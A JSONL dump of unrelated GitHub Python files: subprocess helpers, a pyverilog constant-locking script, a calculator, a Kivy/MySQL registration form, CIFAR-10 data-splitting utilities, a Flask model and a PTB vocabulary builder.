+{"seq_id":"22480076124","text":"def execute(cmd) :\n\tpopen = subprocess.Popen(cmd, stdout = subprocess.PIPE, universal_newlines = True)\n\tfor stdout_line in iter(popen.stdout.readline, \"\") :\n\t\tyield stdout_line\n\tpopen.stdout.close()\n\treturn_code = popen.wait()\n\tif return_code :\n\t\traise subprocess.CalledProcessError(return_code, cmd)\n\n\ndef execute(command) :\n\tpopen = subprocess.Popen(command, stdout = subprocess.PIPE, bufsize = 1)\n\tlines_iterator = iter(popen.stdout.readline, b\"\")\n\twhile popen.poll() is None :\n\t\tfor line in lines_iterator :\n\t\t\tnline = line.rstrip()\n\t\t\tprint(nline.decode(\"latin\"), end = \"\\r\\n\", flush = True)\n\n","repo_name":"Cxm211/ExplainingCodeBERTforSemanticClones","sub_path":"Python/data/Filtered Python Codes/Clone505.py","file_name":"Clone505.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"39416638846","text":"import pyverilog.vparser.ast as vast\n\ndef encrypt_value(value, start_kb, cfg):\n #print(\"encrypt\")\n ikey = []\n #print(start_kb)\n #print(start_kb+len(value))\n #print(len(cfg.input_key))\n\n for k in range(start_kb,start_kb+len(value)):\n #print(\"value of k\")\n #print(k)\n\n pos = k % len(cfg.input_key)\n #print(type(pos))\n #print(\"value of pos\")\n #print(pos)\n #print(\"value of pos\")\n #print(cfg.input_key)\n #print(cfg.input_key[1])\n #print(cfg.input_key[pos])\n\n\n ikey.append(int(cfg.input_key[pos]))\n\n\n #print(\"hello2\")\n val = []\n rvalue = value[len(value)::-1]\n for k in range(0, len(value)):\n val.append(int(rvalue[k]))\n rresult = []\n for k in range(0,len(value)):\n rresult.append(ikey[k] ^ val[k])\n result = rresult[len(rresult)::-1]\n res = \"\"\n for k in range(0,len(result)):\n res += str(result[k])\n key_str = \"\"\n for k in range(0,len(ikey)):\n key_str += str(ikey[k])\n return [res, key_str]\n\n\ndef is_const(item):\n if item.value.find(\"'\") == -1:\n try:\n val = int(item.value)\n return True\n except ValueError:\n raise Exception(\"Malformed constant\")\n if item.value.find(\"x\") != -1:\n return False\n if item.value.find(\"X\") != -1:\n return False\n return True\n\n\ndef get_const_size(item):\n if item.value.find(\"'\") == -1:\n return -1\n return int(item.value[:item.value.find(\"'\")])\n\ndef binaryToDecimal(n):\n return int(n,2)\n\ndef apply(item, cfg, res, sig_size,list_working_key,user_key,total_constant,set):\n print(\"in const apply\")\n print(item)\n #print(key_value)\n #print(type(key_value))\n #print(\"in apply\")\n #print(item)\n #print(sig_size)\n\n if is_const(item) == False:\n #print(\"is_const\")\n return item\n if sig_size > 0:\n size = sig_size\n else:\n size = get_const_size(item)\n if size == -1:\n return item\n if cfg.obfuscate_consts == -1 or size < cfg.obfuscate_consts or not cfg.obfuscate_region:\n #print(\"second\")\n return item\n\n signed = False\n trimmed = None\n const_type = None\n #print(item.value)\n if item.value.find(\"'sb\") != -1:\n trimmed = item.value[item.value.find(\"sb\")+2:]\n const_type = \"sb\"\n signed = True\n elif item.value.find(\"'b\") != -1:\n const_type = \"b\"\n trimmed = item.value[item.value.find(\"b\")+1:]\n elif item.value.find(\"'d\") != -1:\n #print(\"decimal\")\n const_type = \"d\"\n #print(item.value[item.value.find(\"d\")+1:])\n trimmed = item.value[item.value.find(\"d\")+1:]\n #print(item.value[item.value.find(\"d\")+1:])\n elif item.value.find(\"'h\") != -1:\n const_type = \"d\"\n trimmed = item.value[item.value.find(\"h\")+1:]\n trimmed = str(int(trimmed, 16))\n else:\n const_type = \"d\"\n trimmed = item.value;\n\n #print(\"length trimmed\")\n #print(len(trimmed))\n #print(\"int trimmed\")\n #print(int(trimmed))\n if (const_type == \"b\" or const_type == \"sb\") and len(trimmed) != size and int(trimmed) != 0:\n item.show()\n #raise Exception(\"Malformed constant\")\n if (const_type == \"b\" or const_type == \"sb\") and len(trimmed) == 1 and int(trimmed) == 0:\n trimmed = \"0\" * size\n\n if const_type == \"d\":\n current = int(trimmed)\n trimmed = bin(current)[2:]\n #print(current)\n #print(trimmed)\n\n extra_bits = size - len(trimmed)\n #print(extra_bits)\n if extra_bits > 0:\n if current >= 0:\n trimmed = extra_bits * \"0\" + trimmed\n #print(trimmed)\n else:\n trimmed = extra_bits * \"1\" + trimmed\n\n #print(\"len working key\")\n #print(len(cfg.working_key))\n #print((len(cfg.working_key)+size))\n #print(len(cfg.input_key))\n if cfg.unfold_key == False and ((len(cfg.working_key)+size) > len(cfg.input_key)):\n #print(\"end\")\n return item\n '''\n name=input(\"enter the constant name\")\n name = \"Const_\" + name #str(res.num_consts+total_constant)\n '''\n #print(name)\n name = \"Const_\" + str(res.num_consts)\n sig = vast.Identifier(name)\n #total_size=int(input(\"enter the size\"))\n if size>1:\n #name=input(\"enter the constant name\")\n #name = \"Const_\" + name #str(res.num_consts+total_constant)\n #sig = vast.Identifier(name)\n width = vast.Width( vast.IntConst(str(size-1)), vast.IntConst('0') )\n res.top_output.definitions += (vast.Wire(name, width, signed),)\n else:\n #name=input(\"enter the constant name\")\n #name = \"Const_\" + name\n #sig = vast.Identifier(name)\n res.top_output.definitions += (vast.Wire(name),)\n\n #print(res.top_output.initial_working_key)\n #print(res.top_output.key_bits)\n current_bit_start = res.top_output.initial_working_key + res.top_output.key_bits\n #print(\"current_bit_start\")\n #print(current_bit_start)\n enc, key_value = encrypt_value(trimmed, len(cfg.working_key), cfg)\n #enc=enc[::-1]\n result=binaryToDecimal(enc)\n enc=str(result)\n verilog = vast.IntConst(str(size) + \"\\'d\" + enc)\n #print(\"we are here\")\n\n if size==1:\n set[0]=set[0]+1\n #print(\"we are here 2\")\n #print(type(1))\n if user_key == 1:\n #print(\"i m here in if size 1 key 1\")\n #key_part = vast.Pointer(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start)))\n result=list_working_key[current_bit_start]\n enc=str(result)\n key_part = vast.IntConst(str(size) + \"\\'d\" + enc)\n else:\n #print(\"i m here in else size 1\")\n key_part = vast.Pointer(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start)))\n \n\n else:\n #print(\"we are here 3\")\n set[0]=set[0]+1\n if user_key == 1:\n #print(\"i m here2\")\n #print(\"i m here in if size >1\")\n i=current_bit_start\n string1=\"\"\n while i<=current_bit_start+size-1:\n string1=string1+str(list_working_key[i])\n i=i+1\n #print(string1)\n string1=string1[::-1]\n result=binaryToDecimal(string1)\n enc=str(result)\n key_part = vast.IntConst(str(size) + \"\\'d\" + enc)\n else:\n print(\"i m here in else size >1\")\n key_part = vast.Partselect(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start+size-1)), vast.IntConst(str(current_bit_start)))\n\n #key_part = vast.Partselect(vast.Identifier('working_key'), vast.IntConst(str(current_bit_start+size-1)), vast.IntConst(str(current_bit_start)))\n \n \n res.top_output.items += (vast.Assign(sig, vast.Xor(verilog, key_part)),)\n res.top_output.key_bits += size\n cfg.working_key += key_value #enc[len(enc)::-1]\n #print(cfg.working_key)\n res.top_output.module_key += key_value #enc[len(enc)::-1]\n res.num_consts += 1\n #print(\"sig\")\n #print(sig)\n return sig\n","repo_name":"solmannn/alu","sub_path":"obfuscation_techniques/obfuscate_const.py","file_name":"obfuscate_const.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"26547807967","text":"import math\r\nprint('ATENÇAO')\r\nprint('-='*30)\r\nprint(''' Orientaçao a baixo pós digitar os numero ''')\r\nprint('-='*30)\r\nn=int(input('Digite um numero: '))\r\nn2=int(input('Digite outro numero: ')) \r\nop=0\r\nwhile op!=6:\r\n print('''\r\n [1]= Mutilplicação)\r\n [2]= Subtração\r\n [3]= Adição\r\n [4]= Divisão\r\n [5]== Para continuar\r\n [6] = Sair do programa''')\r\n op=input('Digite a opçao: ').upper().strip()\r\n print('-='*30)\r\n if op == '1':\r\n print(f'{n} X {n2} = {n*n2}')\r\n elif op=='2':\r\n print(f'{n}-{n2}={n-n2}')\r\n elif op=='3':\r\n print(f'{n}+{n2}={n+n2}')\r\n elif op=='4':\r\n print(f'{n} / {n2}={n/n2} ')\r\n elif op=='5':\r\n n=int(input('Digite um numero:'))\r\n n2=int(input('Digite outro numero: '))\r\n else:('Operador nao suportado ')\r\nprint('Fim do programa')","repo_name":"Dacianobrian/Calculadora.py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"71014187729","text":"# -*- coding: utf-8 -\r\nfrom kivy.app import App\r\nfrom kivy.lang.builder import Builder\r\nfrom kivy.config import Config\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.vkeyboard import VKeyboard\r\nfrom kivy.core.window import Window\r\nfrom kivy.properties import ObjectProperty\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.dropdown import DropDown\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nimport re\r\nfrom datetime import datetime\r\nimport mysql.connector\r\nmydb=mysql.connector.connect(host=\"127.0.0.1\", user=\"root\", passwd=\"qwer@1234\", database=\"db1\")\r\nfrom datetime import date\r\n\r\nConfig.set('kivy', 'keyboard_mode', 'systemanddocked')\r\nBuilder.load_file('KV/p_form.kv')\r\nBuilder.load_file('KV/p_registration.kv')\r\nBuilder.load_file('KV/p_pre_post_test.kv')\r\n\r\n\r\nclass CustomDropDown(DropDown):\r\n pass\r\n\r\n\r\nclass FormScreen(Screen):\r\n yes = ObjectProperty(True)\r\n no = ObjectProperty(True)\r\n\r\n def __init__(self, **kwargs):\r\n super(FormScreen, self).__init__(**kwargs)\r\n gender_dropdown = CustomDropDown()\r\n self.ids.p_gender.bind(on_release=gender_dropdown.open)\r\n gender_dropdown.bind(on_select=lambda instance, x: setattr(self.ids.p_gender, 'text', x))\r\n self.ids.p_dob.bind(on_text_validate=lambda x: self.match(self.ids.p_dob))\r\n\r\n def match(self, dob_field):\r\n dob_pattern = r'(((0[1-9]|[12][0-9]|3[01])([/])(0[13578]|10|12)([/])(\\d{4}))|(([0][1-9]|[12][0-9]|30)([/])(0[469]|11)([/])(\\d{4}))|((0[1-9]|1[0-9]|2[0-8])([/])(02)([/])(\\d{4}))|((29)(\\.|-|\\/)(02)([/])([02468][048]00))|((29)([/])(02)([/])([13579][26]00))|((29)([/])(02)([/])([0-9][0-9][0][48]))|((29)([/])(02)([/])([0-9][0-9][2468][048]))|((29)([/])(02)([/])([0-9][0-9][13579][26])))'\r\n\r\n numbers = re.match(dob_pattern, dob_field.text)\r\n if numbers:\r\n curr_year = int(date.today().year)\r\n dob_year = int(self.ids.p_dob.text[6:10])\r\n age = str(curr_year - dob_year)\r\n self.ids.p_age.text = age + \" Years\"\r\n else:\r\n dob_pop = Popup(title=\"Error\", size=(280, 200), size_hint=(None, None),\r\n content=Label(text=\"Please Enter a valid Date Of Birth. \\n(e.g. 01/01/1999)\"))\r\n dob_pop.open()\r\n dob_field.text = ''\r\n self.ids.p_age.text = ''\r\n\r\n def submit_popup(self):\r\n # To get the radio button values\r\n if self.ids.p_smoke_yes.active:\r\n smoke = \"Yes\"\r\n print(\"smoker=\" + smoke)\r\n else:\r\n smoke = \"No\"\r\n print(\"smoker=\" + smoke)\r\n\r\n # To get the gender button values\r\n gender = self.ids.p_gender.text\r\n print(\"gender=\" + gender)\r\n # Popups For Submit Button\r\n pop_sub = Popup(title=\"Submit\", title_align=\"center\", content=Label(text=\"Information Submitted Successfully\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n\r\n pop_empty = Popup(title=\"Error\", title_align=\"center\",\r\n content=Label(text=\"Empty Field.\\nPlease Fill All Information\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n\r\n pop_gender = Popup(title=\"Error\", title_align=\"center\",\r\n content=Label(text=\"Please Select A Gender.\"),\r\n size=(300, 200),\r\n size_hint=(None, None), auto_dismiss=True)\r\n if self.ids.p_fname.text == '' or self.ids.p_height.text == '' or self.ids.p_weight.text == '' \\\r\n or self.ids.p_dob.text == '' or self.ids.p_mname.text == '' or self.ids.p_lname.text == '':\r\n pop_empty.open()\r\n elif self.ids.p_gender.text == 'Gender':\r\n pop_gender.open()\r\n else:\r\n pop_sub.open()\r\n\r\n @staticmethod\r\n def exit_prog():\r\n App.get_running_app().stop()\r\n Window.close()\r\n\r\n @staticmethod\r\n def showKeyboard():\r\n keyboard = VKeyboard()\r\n return keyboard\r\n \r\n def fun(self, p_fname, p_mname, p_lname, p_height,p_weight,p_dob, p_age, p_gender, p_smoke_yes):\r\n \r\n now = datetime.now()\r\n formatted_date = now.strftime('%Y-%m-%d %H:%M:%S')\r\n \r\n datetime_str = p_dob\r\n datetime_object = datetime.strptime(datetime_str, '%d/%m/%Y').date()\r\n mycursor = mydb.cursor()\r\n sql=\"\"\"insert into tb1 \r\n (p_fname, p_mname, p_lname, p_height,p_weight, p_dob, p_age, p_gender, p_smoker, p_registrationinfo) \r\n values( %s, %s, %s, %s, %s, %s, %s, %s , %s , %s)\"\"\"\r\n val = (p_fname, p_mname, p_lname, p_height,p_weight, datetime_object, p_age, p_gender, p_smoke_yes , formatted_date)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n \r\n\r\n\r\nclass RegistrationScreen(Screen):\r\n pass\r\n\r\n\r\nclass PrePostTestScreen(Screen):\r\n pass\r\n\r\n\r\nclass ThisApp(App):\r\n def build(self):\r\n screen_mgr = ScreenManager()\r\n screen_mgr.add_widget(RegistrationScreen(name=\"Registration_Screen\"))\r\n screen_mgr.add_widget(FormScreen(name=\"Form_Screen\"))\r\n screen_mgr.add_widget(PrePostTestScreen(name=\"PrePostTest_Screen\"))\r\n return screen_mgr\r\n\r\n\r\nif __name__ == '__main__':\r\n ThisApp().run()\r\n","repo_name":"Ghavan/Dbreath","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9937628391","text":"#!/usr/bin/env python\n# imports and declarations\nimport datetime\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\nimport tensorflow as tf\nimport tensorflow.keras.datasets.cifar10 as cifar10\n\n# validate that tensorflow works and GPU is properly configured\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\ndef holdout(data_in,training_pct=0.7):\n \"\"\"\n Split data into training and validation sets based on a given ratio\n Inputs: \n - `data_in`, CIFAR10 data\n - `training_pct`, fraction of data used for training (default `0.7`)\n\n Outputs:\n - tuple of `training_data` and `validation_data` after split\n \"\"\"\n num_records_in_training_set=int(len(data_in) * training_pct)\n np.random.shuffle(data_in)\n training_data = data_in[0:num_records_in_training_set]\n validation_data = data_in[num_records_in_training_set:]\n return training_data, validation_data\n\ndef select_k_training_group(k_groups, validation_set_index):\n training_set = np.array([])\n for i in range(len(k_groups)):\n if i == validation_set_index -1:\n validation_set = k_groups[i]\n else:\n if training_set.size == 0:\n training_set = k_groups[i]\n else:\n training_set = np.concatenate((training_set,k_groups[i]))\n return training_set, validation_set\n\ndef k_folds(data_in, num_groups, validation_set_index):\n \"\"\"\n Split data into a specified number of groups and select one as validation data,\n using the rest as training data\n\n Inputs:\n `data_in` -- CIFAR10 data; \n `num_groups` -- number of k-groups used; and\n `validation_set_index` -- k-group to use as validation set\n\n Outputs:\n `k_groups` -- dataset split into specified number of groups\n \"\"\"\n np.random.shuffle(data_in)\n leftover_records_as_divided = len(data_in) % num_groups\n num_records_in_k_group = math.floor(len(data_in)/num_groups)\n k_groups = []\n previous_k_slice = 0\n for i in range(num_groups):\n k_slice = previous_k_slice + num_records_in_k_group\n if i < leftover_records_as_divided:\n k_slice = k_slice + 1\n k_group = data_in[previous_k_slice:k_slice]\n k_groups.append(k_group)\n previous_k_slice = k_slice\n\n training_set = np.array([])\n for i in range(len(k_groups)):\n if i == validation_set_index -1:\n validation_set = k_groups[i]\n else:\n if training_set.size == 0:\n training_set = k_groups[i]\n else:\n training_set = np.concatenate((training_set,k_groups[i]))\n # return k_groups\n return training_set, validation_set\n\ndef generate_random_numbers(num_randoms, sample_space):\n \"\"\"\n Generate an array of random numbers.\n \"\"\"\n randoms = []\n while len(randoms) < num_randoms:\n new_random = random.randint(0,sample_space)\n randoms.append(new_random)\n return randoms\n\ndef bootstrap(data_in, batch_size, num_batches):\n \"\"\"\n Generate n samples of a given batch size, containing random data, with replacement\n\n Inputs:\n `data_in` -- CIFAR10 data; \n `num_groups` -- number of k-groups used; and\n `validation_sel` -- which k group to use for testing data\n\n Outputs:\n `bootstrap_datasets` -- batched datasets of specified size\n \"\"\"\n bootstrap_datasets=[None] * num_batches\n for i in range(num_batches):\n bootstrap_datasets[i] = []\n np.random.shuffle(data_in)\n random_indices = generate_random_numbers(batch_size, len(data_in))\n for j in random_indices:\n bootstrap_datasets[i].append(data_in[j])\n return bootstrap_datasets\n\ndef batch_generator(data_in, batch_size):\n \"\"\"\n Yields a batch of specified size, wrapping around to start of data input\n if batch size does not divide evenly into data size\n\n Inputs:\n `data_in` -- CIFAR10 data; and\n `batch_size` -- desired size of the batch\n\n Yields:\n `batch` -- batched dataset of specified size\n \"\"\"\n offset = 0\n overflow_data = [] \n while True:\n np.random.shuffle(data_in)\n offset = 0\n if len(overflow_data) > 0:\n offset = batch_size - len(overflow_data)\n print('data wraparound occurred here; pulling {} records from front'.format(offset))\n yield np.concatenate((overflow_data, data_in[0:offset]))\n overflow_data = []\n\n for x in range(offset, len(data_in), batch_size):\n output_data = data_in[x : x + batch_size]\n if len(output_data) != batch_size:\n overflow_data = output_data\n else:\n yield output_data\n\ndef k_folds_generator(data_in, num_groups):\n \"\"\"\n Split data into a specified number of groups and select one as validation data,\n using the rest as training data. In each \"fold,\" yield a different group as the\n validation data\n\n Inputs:\n `data_in` -- CIFAR10 data; and\n `num_groups` -- number of k-groups to fold\n\n Yields:\n `training_data`, `validation_data` -- tuple of data for training and validation\n \"\"\"\n np.random.shuffle(data_in)\n leftover_records_as_divided = len(data_in) % num_groups\n num_records_in_k_group = math.floor(len(data_in)/num_groups)\n k_groups = []\n previous_k_slice = 0\n for i in range(num_groups):\n k_slice = previous_k_slice + num_records_in_k_group\n if i < leftover_records_as_divided:\n k_slice = k_slice + 1\n k_group = data_in[previous_k_slice:k_slice]\n k_groups.append(k_group)\n previous_k_slice = k_slice\n\n for k in range(0,len(k_groups)):\n training_set = np.array([])\n validation_set = []\n for l in range(len(k_groups)):\n if l == k:\n validation_set = k_groups[l]\n else:\n if training_set.size == 0:\n training_set = k_groups[l]\n else:\n training_set = np.concatenate((training_set,k_groups[l]))\n yield training_set, validation_set\n\ndef plot_cifar_img(data_in):\n \"\"\"\n Generic image plotting function\n \"\"\"\n n = 16\n now = datetime.datetime.now()\n plt.figure(figsize=(20,4))\n for i in range(n):\n ax = plt.subplot(2, n, i+1)\n plt.imshow(data_in[i].reshape(32,32,3))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.savefig('output/{}.png'.format(now.strftime(\"%Y%m%d-%H%M\")))\n\n# Load CIFAR10 data\n(cifar10_data, _), (_, _) = cifar10.load_data()\ncifar10_data = cifar10_data / 255\n\n# Display sample images\nplot_cifar_img(cifar10_data)\n\n# Perform test of holdout method\nholdout_training_pct=0.7\nholdout_training_data, holdout_validation_data = holdout(cifar10_data,holdout_training_pct)\nprint('size of holdout training data with {} ratio: {} records'.format(holdout_training_pct, len(holdout_training_data)))\nprint('size of holdout validation data with {} ratio: {} records'.format(holdout_training_pct, len(holdout_validation_data)))\n\n# Perform test of k-groups method\nnum_k_groups = random.randint(3,10)\nvalidation_index = random.randint(1, num_k_groups)\nprint('getting {} groups of data with k-folding and setting group {} as the validation set'.format(num_k_groups, validation_index))\nk_train, k_test = k_folds(cifar10_data, num_k_groups, validation_index)\nprint('training set length: {}, validation set length: {}'.format(len(k_train),len(k_test)))\n\n# Perform test of bootstrap method\nbootstrap_batch_size = random.randint(100,1500)\nprint('sampling five batches of {} CIFAR10 images'.format(bootstrap_batch_size))\nbootstrap_out = bootstrap(cifar10_data, bootstrap_batch_size, 5)\nfor i in range(len(bootstrap_out)):\n print('{} images in batch {}'.format(len(bootstrap_out[i]),i+1))\n\n# Perform test of batch generator function\ngen_batch_size = random.randint(10000,20000)\ngenerator_out = batch_generator(cifar10_data, gen_batch_size)\n\nprint('getting ten batches of size {} from CIFAR10 data'.format(gen_batch_size))\n\nfor i in range(10):\n print('generator produced {} records for iteration {}'.format(len(next(generator_out)),i+1))\n\n# Perform test of k-folds, generator version\nk_fold_gen_num_groups = random.randint(2,15)\nprint('getting {} groups of data with iterative k-folding'.format(k_fold_gen_num_groups))\nk_gen_out = k_folds_generator(cifar10_data, k_fold_gen_num_groups)\nfor i in range(k_fold_gen_num_groups):\n k_gen_train, k_gen_test = next(k_gen_out)\n print('fold {}: training size -- {}, validation size -- {}'.format(i+1,len(k_gen_train),len(k_gen_test)))\n","repo_name":"pdavlin/spring-2021-writing-submissions","sub_path":"csci-8920/hw-1/hw-1.py","file_name":"hw-1.py","file_ext":"py","file_size_in_byte":8199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21078809390","text":"from random import randrange\n\n\nlinha=int(input('Número de linhas: '))\ncolunas=int(input(\"Número de colunas: \"))\nsoma=0\na=[[randrange(0,2) for i in range(colunas)] for j in range (linha)]\n\nfor i in range(linha):\n for j in range(colunas):\n print(a[i][j], end=' ')\n soma+=(a[i][j])\n print()\nif soma==0:\n print('Matriz nula')\n\n\n","repo_name":"locolome/Curso-de-Python","sub_path":"Aula25.Py/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73180833167","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import ninja\n\nclass Dojo:\n db_name = 'python-exam-practice'\n\n def __init__(self, data):\n self.id = data['id']\n self.name = data['name']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.ninjas = []\n\n @classmethod\n def get_all(cls):\n query = 'SELECT * FROM dojos;'\n return [cls(result) for result in connectToMySQL(cls.db_name).query_db(query)]\n\n @classmethod\n def get_one_with_ninjas(cls, data):\n query = 'SELECT * FROM dojos LEFT JOIN ninjas ON dojos.id = ninjas.dojo_id WHERE dojos.id = %(id)s ;'\n results = connectToMySQL(cls.db_name).query_db(query, data)\n dojo = cls(results[0])\n for row in results:\n if row['ninjas.id'] == None:\n break\n ninja_data = {\n 'id' : row['ninjas.id'],\n 'created_at' : row['ninjas.created_at'],\n 'updated_at' : row['ninjas.updated_at'],\n 'first_name' : row['first_name'],\n 'last_name' : row['last_name'],\n 'age' : row['age'],\n 'dojo_id' : row['dojo_id'],\n }\n dojo.ninjas.append(ninja.Ninja(ninja_data))\n return dojo\n\n @classmethod\n def create(cls, data):\n query = 'INSERT INTO dojos (name) VALUES ( %(name)s );'\n return connectToMySQL(cls.db_name).query_db(query, data)","repo_name":"kylehench/Python-Public","sub_path":"flask_mysql/belt_review/extra_practice/dojos_and_ninjas2/flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"11757367592","text":"import tensorflow as tf\nimport numpy as np\nfrom tqdm import *\n\nfrom glob import glob\nfrom gensim import corpora\nfrom nltk.tokenize import RegexpTokenizer\n\n\nimport time\nimport os\nimport re\n\nclass PTBReader(object):\n _WORD_SPLIT = re.compile(\"([.,!?\\\"':;)(])\")\n _DIGIT_RE = re.compile(r\"(^| )\\d+\")\n tokenizer = RegexpTokenizer(r'@?\\w+')\n\n _BAR = \"_BAR\"\n _UNK = \"_UNK\"\n _EOS = \"\"\n\n _START_VOCAB = [_BAR, _UNK]\n\n def __init__(self,data_dir,dataset_name, vocab_size):\n self.data_dir = data_dir\n self.dataset_name = dataset_name\n self.vocab_size = vocab_size\n self.EOS_ID = self.vocab_size - 1\n self.UNK_ID = self.vocab_size - 2\n\n @staticmethod\n def _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\n def basic_tokenizer(self,sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = PTBReader.tokenizer.tokenize(sentence)\n return [w for w in words] # if w not in PTBReader.cachedStopWords]\n\n def read_words(self):\n worded_sentences = []\n with tf.gfile.GFile(self.filename,\"r\") as f:\n sentences = f.read().split(\"\\n\")\n worded_sentences = [ sent.split() for sent in sentences]\n for i in np.arange(len(worded_sentences)):\n worded_sentences[i].append(\"\")\n\n print(worded_sentences[0])\n\n def initialize_vocabulary(self,vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n def build_vocab_file(self):\n train_path = os.path.join(self.data_dir, self.dataset_name,\"train\")\n\n context_fname = os.path.join(self.data_dir, self.dataset_name, '%s.context' % self.dataset_name)\n vocab_fname = os.path.join(self.data_dir, self.dataset_name, '%s.vocab%s' % (self.dataset_name, self.vocab_size))\n\n if not os.path.exists(context_fname):\n print(\" [*] Combining all contexts for %s in %s ...\" % (self.dataset_name, train_path))\n context = self.get_all_context(train_path, context_fname)\n else:\n context = tf.gfile.GFile(context_fname, mode=\"r\").read()\n print(\" [*] Skip combining all contexts\")\n\n if not os.path.exists(vocab_fname):\n t0 = time.time()\n print(\"Creating vocabulary %s\" % (vocab_fname))\n print(\"max_vocabulary_size: \", self.vocab_size)\n texts = [word for word in context.lower().split()]# if word not in DataReader.cachedStopWords]\n dictionary = corpora.Dictionary([texts], prune_at=self.vocab_size-2)\n dictionary.filter_extremes(no_below=1, no_above=1, keep_n=self.vocab_size-2)\n\n print(\"vocab length: \", len(dictionary.token2id))\n print(\"Tokenize : %.4fs\" % (t0 - time.time()))\n dictionary.save(vocab_fname)\n\n print(\" [*] Convert data in %s into vocab indicies...\" % (train_path))\n self.questions_to_token_ids(train_path, vocab_fname, self.vocab_size)\n\n\n def questions_to_token_ids(self,data_path, vocab_fname, vocab_size):\n vocab, _ = self.initialize_vocabulary(vocab_fname)\n for fname in tqdm(glob(os.path.join(data_path, \"*.txt\"))):\n self.data_to_token_ids(fname, fname + \".ids%s\" % vocab_size, vocab)\n\n\n def data_to_token_ids(self,data_path, target_path, vocab,\n tokenizer=None, normalize_digits=True):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. See comment\n for sentence_to_token_ids on the details of token-ids format.\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n tokenizer: a function to use to tokenize each sentence;\n if None, basic_tokenizer will be used.\n normalize_digits: Boolean; if true, all digits are replaced by 0s.\n \"\"\"\n # if not gfile.Exists(target_path):\n if True:\n with tf.gfile.GFile(data_path, mode=\"r\") as data_file:\n counter = 0\n results = []\n for line in data_file:\n token_ids = self.sentence_to_token_ids(line, vocab, tokenizer,\n normalize_digits)\n results.append(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n try:\n len_d, len_q = len(results[2].split()), len(results[4].split())\n except:\n return\n with open(\"%s_%s\" % (target_path, len_d + len_q), mode=\"w\") as tokens_file:\n tokens_file.writelines(results)\n\n def sentence_to_token_ids(self,sentence, vocabulary,\n tokenizer=None, normalize_digits=True):\n \"\"\"Convert a string to list of integers representing token-ids.\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n Args:\n sentence: a string, the sentence to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n tokenizer: a function to use to tokenize each sentence;\n if None, basic_tokenizer will be used.\n normalize_digits: Boolean; if true, all digits are replaced by 0s.\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n if tokenizer:\n words = tokenizer(sentence)\n else:\n words = self.basic_tokenizer(sentence)\n\n if not normalize_digits:\n return [vocabulary.get(w, self.UNK_ID) for w in words]\n # Normalize digits by 0 before looking words up in the vocabulary.\n return [vocabulary.get(re.sub(PTBReader._DIGIT_RE, \" \", w), self.UNK_ID) for w in words]\n\n\n def get_all_context(self,dir_name, context_fname):\n context = \"\"\n for fname in tqdm(glob(os.path.join(dir_name, \"*.txt\"))):\n with open(fname) as f:\n try:\n lines = f.read().split(\"\\n\")\n\n context += (\" \").join(lines)\n except:\n print(\" [!] Error occured for %s\" % fname)\n print(\" [*] Writing %s ...\" % context_fname)\n with open(context_fname, 'w') as f:\n f.write(context)\n 